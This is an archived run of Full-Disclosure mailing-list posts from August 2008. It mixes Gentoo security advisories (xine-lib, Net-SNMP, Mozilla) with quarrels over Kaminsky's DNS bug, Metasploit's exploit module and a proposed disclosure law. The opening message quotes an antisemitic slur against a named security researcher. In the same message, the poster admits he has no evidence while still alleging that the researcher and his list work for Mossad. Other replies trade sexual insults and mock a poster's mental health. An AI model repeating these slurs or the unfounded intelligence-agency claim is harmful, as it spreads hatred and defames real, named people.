He's a hero to all who read his cut-n-paste blog, not a true InfoSec worker. From xploitable at gmail.com Wed Aug 6 00:47:47 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 6 Aug 2008 00:47:47 +0100 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' In-Reply-To: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> References: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> Message-ID: <4b6ee9310808051647m68c24127n941e2b8cbf91ab2@mail.gmail.com> On Tue, Aug 5, 2008 at 6:26 AM, Robert Holgstad wrote: > http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html > > seems dan isn't the only press whore around! rebouncing from his embarasing > post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his > crew of javascript gurus have whipped up another rehash of an old class of > bugs that has been used in the wild for a long time. we personally want to > thank nate for his great work hes done for conferences over the years > filling up their talking spots with useless crap. his work is only rivaled > by gadi evron who gets accepted to every conference because declining a fat > AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers > after you by the end of business day. > > once again we would ilke to thank nate for his cutting edge research and > hopefully he will get nommed for next years pwnie life time acheivement > award! > Don't forget Funsec is run by Mossad and that all the silly people on that list who post on it don't realise what intelligence organization they are contributing to. Of course there is no publically available information to prove Gadi Evron has connections with Mossad, but I personally assume its probably the case. 
All the best, n3td3v From rbu at gentoo.org Wed Aug 6 01:02:36 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:02:36 +0200 Subject: [Full-disclosure] [ GLSA 200808-01 ] xine-lib: User-assisted execution of arbitrary code Message-ID: <200808060202.40999.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-lib: User-assisted execution of arbitrary code Date: August 06, 2008 Bugs: #213039, #214270, #218059 ID: 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== xine-lib is vulnerable to multiple buffer overflows when processing media streams. Background ========== xine-lib is the core library package for the xine media player, and other players such as Amarok, Codeine/Dragon Player and Kaffeine. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/xine-lib < 1.1.13 >= 1.1.13 Description =========== Multiple vulnerabilities have been discovered in xine-lib: * Alin Rad Pop of Secunia reported an array indexing vulnerability in the sdpplin_parse() function in the file input/libreal/sdpplin.c when processing streams from RTSP servers that contain a large "streamid" SDP parameter (CVE-2008-0073). * Luigi Auriemma reported multiple integer overflows that result in heap-based buffer overflows when processing ".FLV", ".MOV" ".RM", ".MVE", ".MKV", and ".CAK" files (CVE-2008-1482). * Guido Landi reported a stack-based buffer overflow in the demux_nsf_send_chunk() function when handling titles within NES Music (.NSF) files (CVE-2008-1878). 
Impact ====== A remote attacker could entice a user to play a specially crafted video file or stream with a player using xine-lib, potentially resulting in the execution of arbitrary code with the privileges of the user running the player. Workaround ========== There is no known workaround at this time. Resolution ========== All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.13" References ========== [ 1 ] CVE-2008-0073 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0073 [ 2 ] CVE-2008-1482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1482 [ 3 ] CVE-2008-1878 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1878 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. 
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/c01b05a4/attachment.bin From peak at argo.troja.mff.cuni.cz Wed Aug 6 01:07:26 2008 From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky) Date: Wed, 6 Aug 2008 02:07:26 +0200 (MET DST) Subject: [Full-disclosure] Kaminsky's Law In-Reply-To: <4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> Message-ID: <20080806020147.339.0@argo.troja.mff.cuni.cz> On Fri, 25 Jul 2008, n3td3v wrote: > - That the people who release information and/or code early, they get > fined for every computer system compromised because of the > vulnerability information and/or code disclosure, on top of the jail > sentence. Heh, is it going to include the vulnerable code (or protocol specification or whatever) itself? After all, the vulnerable code (or protocol or whatever) contains all the information needed to exploit it! -- Pavel Kankovsky aka Peak / Jeremiah 9:21 \ "For death is come up into our MS Windows(tm)..." \ 21th century edition / From ureleet at gmail.com Wed Aug 6 01:18:38 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:18:38 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <4898BAF7.5050100@nc.rr.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4898BAF7.5050100@nc.rr.com> Message-ID: <6158bb410808051718q1a5d6b29xfa613db8931c27d6@mail.gmail.com> On Tue, Aug 5, 2008 at 4:41 PM, scott wrote: > You can't expect n3td3v to understand things like that. He's a hero to > all who read his cut-n-paste blog, not a true InfoSec worker. been saying that for awhile now. 
okay, so from now on, everyoen run everything you do through n3td3v. let him b the final approval for all things infosec. that way he cant bitch anymore and he'll stfu. From ureleet at gmail.com Wed Aug 6 01:19:01 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:19:01 -0400 Subject: [Full-disclosure] Fwd: Comment on: Microsoft to give partners heads-up on security vulnerabilities In-Reply-To: <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com> References: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com> <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com> Message-ID: <6158bb410808051719m10b3bd8md41fcac33795e805@mail.gmail.com> theyve been doing this 4 years. get in the now. On Tue, Aug 5, 2008 at 11:27 AM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Tue, Aug 5, 2008 at 4:24 PM > Subject: Comment on: Microsoft to give partners heads-up on security > vulnerabilities > To: n3td3v > > > by n3td3v August 5, 2008 8:17 AM > > Verbal contracts of non-disclosure agreements don't work, you need a > new law in place, which I call the responsible disclosure act, > http://seclists.org/fulldisclosure/2008/Jul/0439.html to enforce the > agreement by a law if the agreement is broken. Or are you guys just > gonna do another "oops the cat's out the bag" again like what happened > with the verbal contract agreement Dan Kaminsky had with everyone > before a blog entry leaked the vulnerability by *accident*. Is this > Microsoft agreement of non-disclosure actually enforceable by any > current law? If not a new law is needed to be drawn up, see the link > above, or this "Microsoft Active Protection Program" is gonna turn out > a complete shambles. > > http://news.cnet.com/8601-1009_3-10006325.html?communityId=2114&targetCommunityId=2114&messageId=772539#772539 > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:20:30 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:20:30 -0400 Subject: [Full-disclosure] Fwd: Are Bug Disclosures Helping or Hurting? In-Reply-To: References: <4b6ee9310807300640n2926b00dk4581134e615ee884@mail.gmail.com> <4b6ee9310807300649v3425124ftc984049c7eb7e43a@mail.gmail.com> <4b6ee9310807301354j1428205ctd16766c13c92530a@mail.gmail.com> Message-ID: <6158bb410808051720ua0e81c7h1df4654f4aaf12bc@mail.gmail.com> oh, he's admitting it now. On Thu, Jul 31, 2008 at 3:10 AM, Knud Erik Højgaard wrote: > On Wed, Jul 30, 2008 at 10:54 PM, n3td3v wrote: > >> So far my mental health has been in decline > > Yes, we can tell. > -- > knud > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:21:21 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:21:21 -0400 Subject: [Full-disclosure] Re : CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit In-Reply-To: <200807251438.20812.fdlist@digitaloffense.net> References: <1216856066.3153.76.camel@localhost> <48895415.4040304@micom.mng.net> <6e1123bc0807251205l6cf1069bu63a0717c9a3ddef2@mail.gmail.com> <200807251438.20812.fdlist@digitaloffense.net> Message-ID: <6158bb410808051721s58329b11m46f2f47ff26dfbb6@mail.gmail.com> noice!!! On Fri, Jul 25, 2008 at 3:38 PM, H D Moore wrote: > On Friday 25 July 2008, tixxDZ wrote: >> I do not want to offend anyone (Metasploit people), this is a simple >> joke: can you share with us all the logs of the vulnerable servers ? >> ;) , the exploit will use the Metasploit service to verify >> exploitability.
ex checking my Opendns: > > The exploit needs a service to determine the source port used by the > target name server. The 'check' command will do this and could probably > use a better warning about information disclosure. The exploit itself > will also query the Metasploit service if you set SRCPORT to 0. While > this means we *could* capture a list of vulnerable nameservers which > query this service, honestly we don't care and aren't logging it. There > are much more effective ways to scan for exploitable cache servers :-) > > The source code for the helper service is also a Metasploit module and can > be found under modules/auxiliary/server/dns/spoofhelper.rb > > If you want to use your own server for this, just change > *.red.metasploit.com to be a domain handled by your own copy of the > spoofhelper module. In the future, we will add an option to specify a the > nameserver used for this check. > > To clarify: > > - Nothing is sent to metasploit.com unless SRCPORT is manually set to '0' > or the check command is run (non-standard for aux modules). > > - The only information we receive is the IP and source port of the tested > nameserver. No information is sent about the user's system or their own > IP address. > > - Even though this information could be logged and sorted and whatnot, we > honestly don't care and just added it as a convenience feature. We dont > keep records of the queries hitting the server and have no plans to start > doing so. > > - If you don't like it, don't run 'check' and don't set SRCPORT to '0' > for automatic mode. It won't hurt our feelings and you are free to modify > the module to point at your own helper service. > > Cheers, > > -HD > > > PS. You can use the service outside of the module to check various > servers. 
For example: > > while true; do dig +short -t TXT `date +%s`.red.metasploit.com @4.2.2.3; > sleep 1; done > "209.244.4.227:33165 1217014609.red.metasploit.com" > "209.244.4.227:32728 1217014610.red.metasploit.com" > "209.244.4.227:29607 1217014611.red.metasploit.com" > "209.244.4.227:28032 1217014612.red.metasploit.com" > "209.244.4.227:25992 1217014613.red.metasploit.com" > "209.244.4.227:31301 1217014614.red.metasploit.com" > "209.244.4.227:22884 1217014615.red.metasploit.com" > "209.244.4.227:33722 1217014616.red.metasploit.com" > > ^- changing ports means the box is patched. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:23:32 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:23:32 -0400 Subject: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award In-Reply-To: <4b6ee9310807230200o6193f3b6jec06ba5738e80da3@mail.gmail.com> References: <4b6ee9310807230200o6193f3b6jec06ba5738e80da3@mail.gmail.com> Message-ID: <6158bb410808051723r3cae2526s1d314f9cf39dc48e@mail.gmail.com> hey, how overhyped is the shit now that its in the wild and proving ur ass wrong bitch? On Wed, Jul 23, 2008 at 5:00 AM, n3td3v wrote: > On Fri, Jul 11, 2008 at 9:22 PM, Sandy Vagina wrote: >> >> n3td3v wrote: >> > Please nominate Mr.DNS aka Dan Kaminsky for Most Overhyped Bug on the >> > Pwnie Awards 2008. >> >> Perhaps if you bothered to read anywhere close to as much as you >> write, you would have seen that Dino, one of the judges, specifically >> disqualified this bug from the Pwnies for being too awesome: >> >> http://blog.trailofbits.com/2008/07/09/dan-kaminsky-disqualified-from-most-overhyped-bug-pwnie/ >> > > Hi Sandy Vagina, > > Looks like they did a U-turn after realising how over hyped the bug actually is.
> > Nominees > > " > Unspecified DNS cache poisoning vulnerability (CVE-2008-1447) > > Dan Kaminsky > > Dan Kaminsky is credited with discovering some unspecified > vulnerabilities in DNS that allow for cache poisoning on a massive > the-intarweb-tubes-will-burst-and-flood-your-basement scale. There has > been massive media attention over this vulnerability and a large > amount of backlash in the security community over the lack of details. > When the full details of the vulnerability are revealed at BlackHat, > the masses will decide whether the hype and secrecy were worth it. > And, more importantly, the Pwnie Judges will vote on whether Dan gets > the Pwnie for Most Overhyped Bug. > > " > > http://pwnie-awards.org/2008/awards.html#overhypedbug > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:25:32 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:25:32 -0400 Subject: [Full-disclosure] Kaminsky's Law In-Reply-To: <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> References: <4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> Message-ID: <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com> im not an alias of n3td3v. my penis isn't as big as his. On Fri, Jul 25, 2008 at 8:00 AM, Exibar wrote: > I think we should have "n3td3v's law" where n3td3v and all his aliases > (professor, uleet, , etc) are required to > get signed written authorization from the community before he can post a > single message....anywhere.... if it's not a unanimous agreement that he > can post, and he does so anyway, he goes to jail.... 
> > > ----- Original Message ----- > From: "n3td3v" > To: > Sent: Friday, July 25, 2008 6:56 AM > Subject: [Full-disclosure] Kaminsky's Law > > >> So what you're saying is HD Moore and |)ruid are exploiting a loop >> hole in the law to do what they do... looks like we need to get the >> law tightened. >> >> I say a "Responsible Disclosure Act" is drawn up, and anyone who >> breaks it goes to jail. >> >> That will mean: >> >> - People will think twice before hitting send on blog entries, >> >> - People will think twice about releasing code early, >> >> - That the decided time line for disclosure can be enforced, >> >> - That the people who release information and/or code early, they get >> fined for every computer system compromised because of the >> vulnerability information and/or code disclosure, on top of the jail >> sentence. >> >> So instead for the future its not just a verbal contract for >> responsible disclosure, its a legally binding contract as well meaning >> if the Responsible Disclosure Act has been signed by the security >> researcher and its affected vendors, then ass hats like HD Moore and >> |)ruid are breaking the law. >> >> The details are a bit fuzzy right now, but i'm sure the big guys in >> the industry can draw up proper rules for a Responsible Disclosure >> Act. >> >> Its likely the Responsible Disclosure Act would only be used in >> exceptional circumstances like this DNS caching vulnerability, and the >> approval of the act per vulnerability case has to be decided on by a >> judge in a court of law, so that the Responsible Disclosure Act can't >> be over used and abused, to keep the use of the act fair and >> proportional in relation to the level of the threat. >> >> That means, Full-Disclosure of vulnerability information and/or >> wouldn't be illegal all the time, just in exceptional circumstances >> that has to be OK'd by a judge. 
>> >> This safeguards the deployment of a patch or patches while telling >> what the importance of patching is to the public, while disallowing >> security researchers to release information and/or code before the >> time line for responsible disclosure. >> >> So the scenario would be, >> >> jake: hey did you hear about the patches being deployed and the news >> reports about the flaw and why the patch is critical? >> >> joe: yes, but the responsible disclosure act has been signed so we >> need to wait until it expires before we can share info. >> >> jake: no way, what's the assigned disclosure date? >> >> joe: the standard 4 weeks, although with the responsible disclosure >> act, after the 4 weeks, the security researcher and vendors can go >> back to the judge to ask for an extra 4 week extension onto that, so >> it could be eight weeks bro before we can become famous for five >> minutes by releasing attack code. >> >> jake: ah, sucks for us, but yeah if the judge has approved the signing >> there isn't a lot we can do unless we want to be labeled criminals, and >> hunted down by interpol. >> >> What has to be told to the community under the act: >> >> - The community must be told the Responsible Disclosure Act has been >> signed and OK'd by a judge. >> >> - The community must be told the date the Responsible Disclosure Act >> expires and disclosure can be made. >> >> - The community must be told that security researcher and vendor can >> go back to the judge after 4 weeks and ask for extension of the act if >> extra time is needed, this must be announced to the community again >> with notice. >> >> All members of the community who break the Responsible Disclosure Act >> are breaking the law and face charges. >> >> Obviously this is just an email I rattled up in five minutes during a >> water machine break, so the big guys in the industry can take these >> ideas and throw them into a properly put together act.
>> >> I think Dan Kaminsky should lobby the industry and the government to >> get something like this drawn up, since he is the one who has inspired >> me to come up with the Responsible Disclosure Act. >> >> I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid >> had to be dick heads about releasing code on purpose against his >> request of Dan Kaminsky, the vendors and people who agree with >> responsible disclosure, especially in exceptional circumstances like >> the DNS flaw. >> >> Maybe we should name it "Kaminsky's Law" out of Solidarity for Dan. >> >> All the best, >> >> n3td3v >> >> >> ---------- Forwarded message ---------- >> From: >> Date: Thu, Jul 24, 2008 at 5:56 PM >> Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in the >> wild >> To: n3td3v >> Cc: full-disclosure at lists.grok.org.uk >> >> >> On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said: >> >>> This whole HD Moore savior of info sec thing has gone on long enough, >>> its time to see him for what he is and get him slammed up in jail >>> along with his counterpart |)ruid. >> >> I'll point out that you happen to live in the country that invented the >> concept of "habeas corpus". In other words, you can't slam him in jail >> unless you actually *charge* him with something. >> >> Please tell us which countr(y|ies) you intend to have him charged, and >> what >> offense. Specific references to statutes would be appreciated (for >> starters, >> I'll help you out and point out that in the US, he probably could *not* be >> charged under 17 USC 1201 (the DMCA anti-circumvention clause), nor under >> 18 >> USC 1030 (the primary federal anti-hacking statute), unless you have >> actual >> evidence that HD personally hacked into a computer covered by 18 USC 1030. >> You >> run into similar issues with 18 USC 2701 (access to stored communication).
>> >> You *might* be able to make a case under 18 USC 2512 (dealing in devices >> for >> intercepting communications), except that there's the nasty clause >> "knowing or >> having reason to know that the design of such device renders it primarily >> useful for the purpose of the surreptitious interception of wire, oral, or >> electronic communications;" - and you'd fail on the "primarily" because >> there's >> lots of *other* uses for Metasploit. >> >> He *is* probably in violation of 36 USC 117, 7 USC 411b, and 26 USC >> 7523(a)(1), >> however. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:26:15 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:26:15 -0400 Subject: [Full-disclosure] (no subject) In-Reply-To: <1217974979.8503.16.camel@b4byl0n> References: <1217974979.8503.16.camel@b4byl0n> Message-ID: <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com> does that research involve you using a subject line in ur emails? On Tue, Aug 5, 2008 at 6:22 PM, Bernhard Mueller wrote: > Hello, > > We recently decided to release some of our research to the public, so > selected presentations from our internal tech meetings will from now on > be available for download at SEC Consult website. The presentations > (some of which are in german) will include everything from general > howtos to highly specialized pentesting-stuff. > We will also release a whitepaper on a variant of the new DNS poisoning > attack tomorrow. 
We wrote this whitepaper along with an exploit a while > ago, and somehow managed NOT to leak it to the press before the Kaminsky > talk :) > The presentations and whitepapers, along with our past presentations > from Blackhat and Deepsec, can be found at: > > > http://www.sec-consult.com/publikationen_e.html > > > Here are some links to what is already online: > > > * A German guide to WEP/WPA cracking, by Johannes Greil: > > > http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf > > * A presentation on the method of using DLL injection to interface to an > SSL connection used by a running process (I used this for > blackbox-testing certain binary SSL client/server applications): > > http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf > > * A short presentation on a method of error-based SQL injection in > Sybase databases, by Thomas Kerbl: > > http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf > > > I hope that some of you will find this useful. > > > Regards, > > Bernhard (Certified Internet Security Superstar) > > -- > _________________________________________ > > Bernhard Mueller > Security Consultant > > SEC Consult Unternehmensberatung GmbH > www.sec-consult.com > > A-1190 Vienna, Mooslackengasse 17 > phone +43 1 8903043 34 > fax +43 1 8903043 15 > mobile +43 676 840301 718 > email b.mueller at sec-consult.com > > Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 > Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt > > Advisor for your information security. > > _______________________________________________ > Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From rbu at gentoo.org Wed Aug 6 01:30:01 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:30:01 +0200 Subject: [Full-disclosure] [ GLSA 200808-02 ] Net-SNMP: Multiple vulnerabilities Message-ID: <200808060230.05828.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Net-SNMP: Multiple vulnerabilities Date: August 06, 2008 Bugs: #222265, #225105 ID: 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Net-SNMP allow for authentication bypass in snmpd and execution of arbitrary code in Perl applications using Net-SNMP. Background ========== Net-SNMP is a collection of tools for generating and retrieving SNMP data. The SNMPv3 protocol uses a keyed-Hash Message Authentication Code (HMAC) to verify data integrity and authenticity of SNMP messages. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/net-snmp < 5.4.1.1 >= 5.4.1.1 Description =========== Wes Hardaker reported that the SNMPv3 HMAC verification relies on the client to specify the HMAC length (CVE-2008-0960). John Kortink reported a buffer overflow in the Perl bindings of Net-SNMP when processing the OCTETSTRING in an attribute value pair (AVP) received by an SNMP agent (CVE-2008-2292).
Impact ====== An attacker could send SNMPv3 packets to an instance of snmpd providing a valid user name and an HMAC length value of 1, and easily conduct brute-force attacks to bypass SNMP authentication. An attacker could further entice a user to connect to a malicious SNMP agent with an SNMP client using the Perl bindings, possibly resulting in the execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All Net-SNMP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/net-snmp-5.4.1.1" References ========== [ 1 ] CVE-2008-0960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960 [ 2 ] CVE-2008-2292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. 
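The verification flaw behind CVE-2008-0960 in the Net-SNMP advisory above, the verifier letting the peer decide how many HMAC octets are compared, is easy to model. The following is an added Python example written for this page, not code from Net-SNMP or from the advisory. It assumes the 12-octet (96-bit) truncated HMAC-SHA that RFC 3414 specifies for SNMPv3 USM; the auth key and message bytes are constructed sample values, and every function name here is hypothetical.

```python
import hashlib
import hmac

# RFC 3414 (SNMPv3 USM) truncates HMAC-MD5 and HMAC-SHA-1 to 96 bits,
# so a valid msgAuthenticationParameters field is always 12 octets.
USM_MAC_LEN = 12


def compute_mac(auth_key: bytes, message: bytes) -> bytes:
    """Truncated HMAC-SHA-96 over the wire message (toy model of RFC 3414)."""
    return hmac.new(auth_key, message, hashlib.sha1).digest()[:USM_MAC_LEN]


def verify_mac_weak(auth_key: bytes, message: bytes, received_mac: bytes) -> bool:
    """The flawed pattern the advisory describes: the verifier compares only as
    many octets as the peer supplied, so the peer chooses the work factor.
    A 1-octet field is accepted whenever that single byte matches (1 in 256)."""
    n = len(received_mac)
    if n == 0:
        return False
    return compute_mac(auth_key, message)[:n] == received_mac


def verify_mac_fixed(auth_key: bytes, message: bytes, received_mac: bytes) -> bool:
    """Hardened verifier: the protocol, not the peer, dictates the MAC length,
    and the comparison is constant-time to avoid a timing side channel."""
    if len(received_mac) != USM_MAC_LEN:
        return False
    return hmac.compare_digest(compute_mac(auth_key, message), received_mac)


def accepted_one_byte_macs(verifier, auth_key: bytes, message: bytes) -> int:
    """Count how many of the 256 possible 1-octet MAC fields a verifier accepts.
    The weak verifier accepts exactly one; the fixed verifier accepts none."""
    return sum(1 for b in range(256) if verifier(auth_key, message, bytes([b])))


def work_factor_bits(compared_len: int) -> int:
    """Bits of guessing work a forger faces when only `compared_len` MAC octets
    are checked: 8 for a 1-octet field versus 96 for the full MAC."""
    return 8 * compared_len


# Constructed sample values (not real SNMPv3 traffic or a real localized key).
SAMPLE_KEY = b"constructed-localized-auth-key"
SAMPLE_MSG = b"constructed SNMPv3 scopedPDU bytes"


def demo() -> dict:
    """Run both verifiers over the sample message and report what each accepts."""
    good = compute_mac(SAMPLE_KEY, SAMPLE_MSG)
    tampered = bytes(b ^ 0xFF for b in good)  # guaranteed to differ from `good`
    return {
        "weak_accepts_full_mac": verify_mac_weak(SAMPLE_KEY, SAMPLE_MSG, good),
        "fixed_accepts_full_mac": verify_mac_fixed(SAMPLE_KEY, SAMPLE_MSG, good),
        "weak_accepts_truncated": verify_mac_weak(SAMPLE_KEY, SAMPLE_MSG, good[:1]),
        "fixed_accepts_truncated": verify_mac_fixed(SAMPLE_KEY, SAMPLE_MSG, good[:1]),
        "fixed_accepts_tampered": verify_mac_fixed(SAMPLE_KEY, SAMPLE_MSG, tampered),
        "weak_candidates_accepted": accepted_one_byte_macs(verify_mac_weak, SAMPLE_KEY, SAMPLE_MSG),
        "fixed_candidates_accepted": accepted_one_byte_macs(verify_mac_fixed, SAMPLE_KEY, SAMPLE_MSG),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The general rule the fixed verifier applies is the one to check for in any MAC or signature code path: the expected tag length comes from the negotiated algorithm, a received tag of any other length is rejected before anything is computed, and the comparison is constant-time. The `work_factor_bits` helper makes the advisory's "HMAC length value of 1" concrete: 8 bits of work instead of 96.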
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/4d28fec4/attachment.bin From rbu at gentoo.org Wed Aug 6 01:42:21 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:42:21 +0200 Subject: [Full-disclosure] [ GLSA 200808-03 ] Mozilla products: Multiple vulnerabilities Message-ID: <200808060242.25071.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla products: Multiple vulnerabilities Date: August 06, 2008 Bugs: #204337, #218065, #230567, #231975 ID: 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in Mozilla Firefox, Thunderbird, SeaMonkey and XULRunner, some of which may allow user-assisted execution of arbitrary code. Background ========== Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications like Firefox and Thunderbird. 
